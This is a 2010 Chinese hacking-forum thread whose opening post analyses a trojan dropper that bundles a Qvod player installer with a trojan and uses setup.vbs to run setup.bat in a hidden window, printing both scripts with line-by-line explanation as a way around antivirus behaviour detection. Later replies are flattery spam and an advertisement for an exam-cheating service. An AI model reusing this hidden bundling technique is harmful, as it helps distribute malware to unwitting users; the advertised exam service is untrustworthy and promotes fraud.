WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 3291查看
  • 4回复

主题

好友

4976

积分

论坛元老

发表于 2010-1-23 20:49:10 |显示全部楼层
转载请注明作者:夏日小虫

第三代杀软的主动和行为厉害的没法说,其实不少大牛其实都找到了方法。只是没放出来,小凉谭通过小熊的指引说是一个bat就能搞定。机缘巧合,在登录97ai。com的时候发现他上面有个网址发部器,一看当然知道是木马啦 ,就下了下来是个exe的自解压,拿到虚拟机上解压了一下,发现释放了四个文件,一个是快播的播放器,一个是木马,一个是名为setup.bat的文件,一个是名为setup.vbs的文件,看了一下啊。发现他首先把四个文件都解压到windows目录下,首先运行setup.vbs,通过这个文件调用setup.bat,再通过bat运行播放器和木马。反正留着也没用就发出来共享一下 。
以下是两个主要文件的内容:
setup.bat内容如下
@echo off
server.exe-----------------------------------------------这个是木马名
QvodSetupPlus3.exe------------------------这个是快播安装文件
setup.vbs内容如下
On Error Resume Next
Dim oShell
Set oShell= WScript.CreateObject("WScript.Shell")
a = oShell.Run ("c:\windows\setup.BAT",0)
(这个vbs就是运行bat用的。但我也不明白什么意思?在新手讨论区发了个帖子。很快得到了回答,在这里要感谢一下咱们暗组中的shedream)
说明如下:
On Error Resume Next        '如果有错误则进行下一句
Dim oShell        '声明变量
Set oShell= WScript.CreateObject("WScript.Shell")        '创建一个WScript.shell对象
a = oShell.Run ("",0)        '打开一个可执行文件,""号内为程序路径

主题

好友

88

积分

注册会员

发表于 2010-1-30 14:35:07 |显示全部楼层
记得一位高人说...好帖子与垃圾帖的区别在于...好帖子越看越暖...而垃圾帖...越看越寒...我呢...一开始就和普通人一样...不相信真有一种帖子可以让人学会忘记烦恼和所有不开心的事情...所以...我选择看垃圾帖...选择垃圾帖的人...一般都比较冷静..觉得冥冥中一直在等楼猪写这个帖子...我以为...楼猪的帖子写出来...就应该是一部传世私服之作...到现在我才发现...什么事情都是可以变的...惟独不变的是楼猪的精彩原创...就好像我一直以为自己文笔不错...忽然看到楼猪帖子...才发现我输了...因为在我读楼猪的帖子的时候...我忘记烦恼和所有不开心的事情...整个人好象沐浴在4月杭州温暖的春风中..我决定以后只会看好帖子...那种让人越看越暖的好帖子...那种让人忘记烦恼和所有不开心的事情的好帖子...换句话说...我以后只看楼猪的帖子...
























折扣网  打折网   精品男装  时尚女装
回复

使用道具 举报

主题

好友

8

积分

新手上路

发表于 2010-2-14 23:16:44 |显示全部楼层
新手不太懂
回复

使用道具 举报

主题

好友

46

积分

禁止访问

发表于 2010-3-26 11:29:40 |显示全部楼层
苍天之下,厚土之上,竟有如此奇人异士,文人墨客!讥讽于谈笑间,笑骂于无形中,层次之高,境界之深,非我等所能匹及,偶像啊!!!仿高人此文,照作一篇,以表仰慕之情...




















折扣网  打折网   精品男装  时尚女装
回复

使用道具 举报

主题

好友

6

积分

禁止访问

发表于 2010-4-3 15:12:38 |显示全部楼层
-q87324092(及时加上,以备需要)欢迎咨询您在为→升学、升级、找工作、加薪、留学考试发愁吗?让我们帮您解决,确保一次性通过!
/资格类考试:外语类考试:学历计算机:财经类考试:建筑工程类
询Q: 87324092.我们公司网址是http://www.xdf668.com/
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-4 19:41 , Processed in 0.073891 second(s), 17 queries .

返回顶部